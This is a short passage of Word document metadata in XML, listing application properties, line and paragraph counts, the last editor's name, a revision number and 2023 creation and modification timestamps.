  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>22</Lines>
  <Paragraphs>6</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3153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周 淞杰</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-20T11:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-24T15:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>